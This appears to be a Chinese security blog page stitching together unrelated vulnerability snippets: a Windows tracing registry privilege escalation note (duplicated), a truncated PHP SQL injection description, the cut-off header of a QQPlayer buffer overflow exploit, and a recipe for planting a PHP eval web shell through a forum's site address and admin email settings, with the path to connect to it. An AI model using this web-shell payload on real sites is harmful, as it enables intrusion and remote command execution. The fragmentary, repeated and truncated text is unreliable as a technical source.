Microsoft Windows Tracing Registry Key ACL Privilege Escalation Vulnerability
说明:今年的blackhat大会上提出来的,同时给出了源代码。
影响:貌似影响了Windows全部系统,演讲时讲的是Vista和Win7,貌似80sec给出了一个Windows 2003也可以利用 。
引用:
http://www.securityfocus.com/bid/42269/info
说明:今年的blackhat大会上提出来的,同时给出了源代码。
影响:貌似影响了Windows全部系统,演讲时讲的是Vista和Win7,貌似80sec给出了一个Windows 2003也可以利用 。
引用:
http://www.securityfocus.com/bid/42269/info
漏洞原因:
安装程序中的/comment/include/comment.class.php中关于function ajaxupdate($field, $id) 函数没有对参数进行过滤,在紧接着下面的数据库操作中引起了漏洞的发生。
原始代码:
function ajaxupdate( $field, $id )
{
From: exploit-db
#!/usr/bin/env python
#################################################################
#
# Title: QQPlayer cue File Buffer Overflow Exploit
# Author: Lufeng Li of Neusoft Corporation
# Vendor: www.qq.com
# Platform: Windows XPSP3 Chinese Simplified
# Tested: QQPlayer 2.3.696.400
# Vulnerable: QQPlayer<=2.3.696.400p1
#
#################################################################
阅读全文…
From: linux520
常规设置:站点地址和管理员邮箱处插入代码
站点地址:http://”””””””<?php eval($_POST[cmd])?>””””””””””’\\
管理员邮箱:”””””””<?php eval($_POST[cmd])?>””””””””””’\\
提交一句话连接:data\bbscache\admin_record.php
最新评论